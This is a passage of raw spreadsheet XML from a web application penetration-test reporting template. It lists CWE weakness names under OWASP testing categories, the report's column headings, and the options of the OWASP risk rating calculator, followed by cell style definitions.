    <t>CWE-95 Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')</t>
  </si>
  <si>
    <t>CWE-97 Improper Neutralization of Server-Side Includes (SSI) Within a Web Page</t>
  </si>
  <si>
    <t>CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')</t>
  </si>
  <si>
    <t>CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')</t>
  </si>
  <si>
    <t>CWE-116 Improper Encoding or Escaping of Output</t>
  </si>
  <si>
    <t>CWE-134 Use of Externally-Controlled Format String</t>
  </si>
  <si>
    <t>CWE-147 Improper Neutralization of Input Terminators</t>
  </si>
  <si>
    <t>CWE-235 Improper Handling of Extra Parameters</t>
  </si>
  <si>
    <t>CWE-434 Unrestricted Upload of File with Dangerous Type</t>
  </si>
  <si>
    <t>CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')</t>
  </si>
  <si>
    <t>CWE-611 Improper Restriction of XML External Entity Reference</t>
  </si>
  <si>
    <t>CWE-643 Improper Neutralization of Data within XPath Expressions ('XPath Injection')</t>
  </si>
  <si>
    <t>CWE-652 Improper Neutralization of Data within XQuery Expressions ('XQuery Injection')</t>
  </si>
  <si>
    <t>CWE-915 Improperly Controlled Modification of Dynamically-Determined Object Attributes</t>
  </si>
  <si>
    <t>CWE-918 Server-Side Request Forgery (SSRF)</t>
  </si>
  <si>
    <t>CWE-1236 Improper Neutralization of Formula Elements in a CSV File</t>
  </si>
  <si>
    <t>CWE-1336 Improper Neutralization of Special Elements Used in a Template Engine</t>
  </si>
  <si>
    <t>WSTG - Error Handling</t>
  </si>
  <si>
    <t>CWE-209 Generation of Error Message Containing Sensitive Information</t>
  </si>
  <si>
    <t>CWE-210 Self-generated Error Message Containing Sensitive Information</t>
  </si>
  <si>
    <t>CWE-431 Missing Handler</t>
  </si>
  <si>
    <t>CWE-497 Exposure of Sensitive System Information to an Unauthorized Control Sphere</t>
  </si>
  <si>
    <t>CWE-544 Missing Standardized Error Handling Mechanism</t>
  </si>
  <si>
    <t>CWE-550 Server-generated Error Message Containing Sensitive Information</t>
  </si>
  <si>
    <t>CWE-728 Improper Error Handling</t>
  </si>
  <si>
    <t>WSTG - Cryptography</t>
  </si>
  <si>
    <t>CWE-261 Weak Encoding for Password</t>
  </si>
  <si>
    <t>CWE-295 Improper Certificate Validation</t>
  </si>
  <si>
    <t>CWE-296 Improper Following of a Certificate's Chain of Trust</t>
  </si>
  <si>
    <t>CWE-297 Improper Validation of Certificate with Host Mismatch</t>
  </si>
  <si>
    <t>CWE-298 Improper Validation of Certificate Expiration</t>
  </si>
  <si>
    <t>CWE-310 Cryptographic Issues</t>
  </si>
  <si>
    <t>CWE-311 Missing Encryption of Sensitive Data</t>
  </si>
  <si>
    <t>CWE-319 Cleartext Transmission of Sensitive Information</t>
  </si>
  <si>
    <t>CWE-320 Key Management Errors</t>
  </si>
  <si>
    <t>CWE-321 Use of Hard-coded Cryptographic Key</t>
  </si>
  <si>
    <t>CWE-322 Key Exchange without Entity Authentication</t>
  </si>
  <si>
    <t>CWE-323 Reusing a Nonce, Key Pair in Encryption</t>
  </si>
  <si>
    <t>CWE-324 Use of a Key Past its Expiration Date</t>
  </si>
  <si>
    <t>CWE-325 Missing Cryptographic Step</t>
  </si>
  <si>
    <t>CWE-326 Inadequate Encryption Strength</t>
  </si>
  <si>
    <t>CWE-327 Use of a Broken or Risky Cryptographic Algorithm</t>
  </si>
  <si>
    <t>CWE-328 Reversible One-Way Hash</t>
  </si>
  <si>
    <t>CWE-329 Not Using a Random IV with CBC Mode</t>
  </si>
  <si>
    <t>CWE-331 Insufficient Entropy</t>
  </si>
  <si>
    <t>CWE-335 Incorrect Usage of Seeds in Pseudo-Random Number Generator(PRNG)</t>
  </si>
  <si>
    <t>CWE-336 Same Seed in Pseudo-Random Number Generator (PRNG)</t>
  </si>
  <si>
    <t>CWE-337 Predictable Seed in Pseudo-Random Number Generator (PRNG)</t>
  </si>
  <si>
    <t>CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator(PRNG)</t>
  </si>
  <si>
    <t>CWE-340 Generation of Predictable Numbers or Identifiers</t>
  </si>
  <si>
    <t>CWE-347 Improper Verification of Cryptographic Signature</t>
  </si>
  <si>
    <t>CWE-354 Improper Validation of Integrity Check Value</t>
  </si>
  <si>
    <t>CWE-649 Reliance on Obfuscation or Encryption of Security-Relevant Inputs without Integrity Checking</t>
  </si>
  <si>
    <t>CWE-759 Use of a One-Way Hash without a Salt</t>
  </si>
  <si>
    <t>CWE-760 Use of a One-Way Hash with a Predictable Salt</t>
  </si>
  <si>
    <t>CWE-780 Use of RSA Algorithm without OAEP</t>
  </si>
  <si>
    <t>CWE-916 Use of Password Hash With Insufficient Computational Effort</t>
  </si>
  <si>
    <t>WSTG - Business logic Testing</t>
  </si>
  <si>
    <t>CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')</t>
  </si>
  <si>
    <t>CWE-472 External Control of Assumed-Immutable Web Parameter</t>
  </si>
  <si>
    <t>CWE-602 Client-Side Enforcement of Server-Side Security</t>
  </si>
  <si>
    <t>CWE-693 Protection Mechanism Failure</t>
  </si>
  <si>
    <t>CWE-799 Improper Control of Interaction Frequency</t>
  </si>
  <si>
    <t>CWE-807 Reliance on Untrusted Inputs in a Security Decision</t>
  </si>
  <si>
    <t>CWE-840 Business Logic Errors</t>
  </si>
  <si>
    <t>WSTG - Client Side Testing</t>
  </si>
  <si>
    <t>CWE-20 Improper Input Validation</t>
  </si>
  <si>
    <t>CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)</t>
  </si>
  <si>
    <t>CWE-312 Cleartext Storage of Sensitive Information</t>
  </si>
  <si>
    <t>CWE-313 Cleartext Storage in a File or on Disk</t>
  </si>
  <si>
    <t>CWE-601 URL Redirection to Untrusted Site ('Open Redirect')</t>
  </si>
  <si>
    <t>CWE-922 Insecure Storage of Sensitive Information</t>
  </si>
  <si>
    <t>CWE-1020 Verify Message Integrity</t>
  </si>
  <si>
    <t>CWE-1022 Use of Web Link to Untrusted Target with window.opener Access</t>
  </si>
  <si>
    <t>CWE-1347 Injection</t>
  </si>
  <si>
    <t>WSTG - API Testing</t>
  </si>
  <si>
    <t>Web Application Vulnerabilities Template</t>
  </si>
  <si>
    <t>No</t>
  </si>
  <si>
    <t>Issue Name</t>
  </si>
  <si>
    <t>Risk</t>
  </si>
  <si>
    <t>Likelihood</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>OWASP Top 10 Mapping</t>
  </si>
  <si>
    <t>Observation and Implication</t>
  </si>
  <si>
    <t>Recommendation</t>
  </si>
  <si>
    <t>Test Evidence</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>WSTG-INFO-001</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>Moderate</t>
  </si>
  <si>
    <t>OWASP Risk Assessment Calculator
Risk Assessment Calculator</t>
  </si>
  <si>
    <t>Likelihood factors</t>
  </si>
  <si>
    <t>Impact factors</t>
  </si>
  <si>
    <t>Threat Agent Factors</t>
  </si>
  <si>
    <t>Technical Impact Factors</t>
  </si>
  <si>
    <t>Skills required</t>
  </si>
  <si>
    <t>Some technical skills [3]</t>
  </si>
  <si>
    <t>Loss of confidentiality</t>
  </si>
  <si>
    <t>Extensive non-sensitive data disclosed [6]</t>
  </si>
  <si>
    <t>Motive</t>
  </si>
  <si>
    <t>Possible reward [4]</t>
  </si>
  <si>
    <t>Loss of Integrity</t>
  </si>
  <si>
    <t>Minimal slightly corrupt data [1]</t>
  </si>
  <si>
    <t>Opportunity</t>
  </si>
  <si>
    <t>Special access or resources required [4]</t>
  </si>
  <si>
    <t>Loss of Availability</t>
  </si>
  <si>
    <t>Minimal secondary services interrupted [1]</t>
  </si>
  <si>
    <t>Population Size</t>
  </si>
  <si>
    <t>Partners [5]</t>
  </si>
  <si>
    <t>Loss of Accountability</t>
  </si>
  <si>
    <t>Attack fully traceable to individual [1]</t>
  </si>
  <si>
    <t>Vulnerability Factors</t>
  </si>
  <si>
    <t>Business Impact Factors</t>
  </si>
  <si>
    <t>Easy of Discovery</t>
  </si>
  <si>
    <t>Automated tools available [9]</t>
  </si>
  <si>
    <t>Financial damage</t>
  </si>
  <si>
    <t>Minor effect on annual profit [3]</t>
  </si>
  <si>
    <t>Ease of Exploit</t>
  </si>
  <si>
    <t>Reputation damage</t>
  </si>
  <si>
    <t>Loss of major accounts [4]</t>
  </si>
  <si>
    <t>Awareness</t>
  </si>
  <si>
    <t>Hidden [4]</t>
  </si>
  <si>
    <t>Non-Compliance</t>
  </si>
  <si>
    <t>Not Applicable [0]</t>
  </si>
  <si>
    <t>Intrusion Detection</t>
  </si>
  <si>
    <t>Logged without review [8]</t>
  </si>
  <si>
    <t>Privacy violation</t>
  </si>
  <si>
    <t>One individual [3]</t>
  </si>
  <si>
    <t>Likelihood score:</t>
  </si>
  <si>
    <t>Impact score:</t>
  </si>
  <si>
    <t>Overall Risk Severity :</t>
  </si>
  <si>
    <t>Select an option</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>Full access or expensive resources required [0]</t>
  </si>
  <si>
    <t>No technical skills [1]</t>
  </si>
  <si>
    <t>Low or no reward [1]</t>
  </si>
  <si>
    <t>System Administrators [2]</t>
  </si>
  <si>
    <t>Practically impossible [1]</t>
  </si>
  <si>
    <t>Theoretical [1]</t>
  </si>
  <si>
    <t>Unknown [1]</t>
  </si>
  <si>
    <t>Active detection in application [1]</t>
  </si>
  <si>
    <t>Some access or resources required [7]</t>
  </si>
  <si>
    <t>Intranet Users [4]</t>
  </si>
  <si>
    <t>Difficult [3]</t>
  </si>
  <si>
    <t>Logged and reviewed [3]</t>
  </si>
  <si>
    <t>Advanced computer user [5]</t>
  </si>
  <si>
    <t>High reward [9]</t>
  </si>
  <si>
    <t>No access or resources required [9]</t>
  </si>
  <si>
    <t>Easy [7]</t>
  </si>
  <si>
    <t>Easy [5]</t>
  </si>
  <si>
    <t>Obvious [6]</t>
  </si>
  <si>
    <t>Network and programming skills [6]</t>
  </si>
  <si>
    <t>Authenticated users [6]</t>
  </si>
  <si>
    <t>Public knowledge [9]</t>
  </si>
  <si>
    <t>Not logged [9]</t>
  </si>
  <si>
    <t>Security penetration skills [9]</t>
  </si>
  <si>
    <t>Anonymous Internet users [9]</t>
  </si>
  <si>
    <t>Minimal non-sensitive data disclosed [2]</t>
  </si>
  <si>
    <t>Damage costs less than to fix the issue [1]</t>
  </si>
  <si>
    <t>Minimal damage [1]</t>
  </si>
  <si>
    <t>Minor violation [2]</t>
  </si>
  <si>
    <t>Minimal seriously corrupt data [3]</t>
  </si>
  <si>
    <t>Minimal primary services interrupted [5]</t>
  </si>
  <si>
    <t>Attack possibly traceable to individual [7]</t>
  </si>
  <si>
    <t>Clear violation [5]</t>
  </si>
  <si>
    <t>Hundreds of people [5]</t>
  </si>
  <si>
    <t>Extensive critical data disclosed [7]</t>
  </si>
  <si>
    <t>Extensive slightly corrupt data [5]</t>
  </si>
  <si>
    <t>Extensive primary services interrupted [7]</t>
  </si>
  <si>
    <t>Attack completely anonymous [9]</t>
  </si>
  <si>
    <t>Significant effect on annual profit [7]</t>
  </si>
  <si>
    <t>Loss of goodwill [5]</t>
  </si>
  <si>
    <t>High profile violation [7]</t>
  </si>
  <si>
    <t>Thousands of people [7]</t>
  </si>
  <si>
    <t>All data disclosed [9]</t>
  </si>
  <si>
    <t>Extensive seriously corrupt data [7]</t>
  </si>
  <si>
    <t>All services completely lost [9]</t>
  </si>
  <si>
    <t>Backruptcy [9]</t>
  </si>
  <si>
    <t>Brand damage [9]</t>
  </si>
  <si>
    <t>Millions of people [9]</t>
  </si>
  <si>
    <t>All data totally corrupt [9]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</si>
</sst>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0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Open Sans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12"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="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color rgb="FF000000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2"/>
      <color rgb="FF333333"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color indexed="81"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <b/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002A7F"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF0091DA"/>
        <bgColor rgb="FF0091DA"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFA5A5A5"/>
        <bgColor indexed="64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0000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0" fontId="3" fillId="0" borderId="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="1"/>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1"/>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="1"/>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="1"/>
  </cellStyleXfs>
  <cellXfs count="101">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="1" applyFont="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="1" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="4" borderId="2" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="5" borderId="2" xfId="2" applyNumberFormat="1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left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="2" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="2" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11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0" fontId="10" fillId="6" borderId="2" xfId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left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="2" xfId="1" quotePrefix="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="4" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="2" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="1" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="13" fillId="0" borderId="1" xfId="2" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="2" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="14" fillId="7" borderId="2" xfId="2" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="5" borderId="2" xfId="2" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="5" borderId="2" xfId="3" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="2" xfId="3" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="2" xfId="3" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="2" xfId="3" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="2" xfId="1" quotePrefix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top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="2" xfId="1" quotePrefix="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="8" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="8" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="4" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="4" xfId="1" quotePrefix="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="4" xfId="1" quotePrefix="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="2" xfId="1" quotePrefix="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="1" xfId="4"/>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="4" applyFont="1"/>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="4" applyFont="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="4" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="4" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="2" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="2" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="2" xfId="2" quotePrefix="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="4" xfId="2" quotePrefix="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="2" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="2" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="2" xfId="5" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="2" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="1" xfId="6"/>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="1" xfId="6" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="1" xfId="6" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="1" xfId="6" applyFont="1"/>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="1" xfId="6" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="1" xfId="6" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="1" xfId="6" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="1" xfId="6" applyFont="1"/>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="1" xfId="6" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="10" borderId="1" xfId="6" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="9" borderId="1" xfId="6" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="12" borderId="1" xfId="6" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="1" xfId="6" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="13" borderId="1" xfId="6" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="14" borderId="1" xfId="6" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="1" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="2" xfId="6" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="1" xfId="6" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="2" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20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 wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="2" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment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5" fillId="2" borderId="1" xfId="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="2" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="7" borderId="2" xfId="2" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="2" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="10" borderId="1" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="11" borderId="1" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="2" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="2" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="2" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="2" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="2" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="1" xfId="6" applyFont="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="2" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="2" xfId="6" applyBorder="1" applyAlignment="1"/>
  </cellXfs>
  <cellStyles count="7">
    <cellStyle name="Hyperlink" xfId="5" builtinId="8"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Normal 2" xfId="2" xr:uid="{5CF958E0-1DAC-AC41-A11A-3D11BDF27DC7}"/>
    <cellStyle name="Normal 3" xfId="1" xr:uid="{6AD97C3A-ACDC-1643-8FF4-480582C9808A}"/>
    <cellStyle name="Normal 4" xfId="3" xr:uid="{6DD2CC53-9303-C345-9245-D722AB0601C9}"/>
    <cellStyle name="Normal 5" xfId="4" xr:uid="{8E5387D6-A894-724F-A28F-9A5C156E0BF4}"/>
    <cellStyle name="Normal 6" xfId="6" xr:uid="{A96E017C-6376-EC4E-8119-FE8368994E6A}"/>
  </cellStyles>
  <dxfs count="318">
    <dxf>
      <font>
        <color rgb="FF92D050"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFF00"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFC000"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFF0000"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF7030A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2D050"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFF00"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFC000"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFF0000"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF7030A0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFBC204B"/>
          <bgColor rgb="FFBC204B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
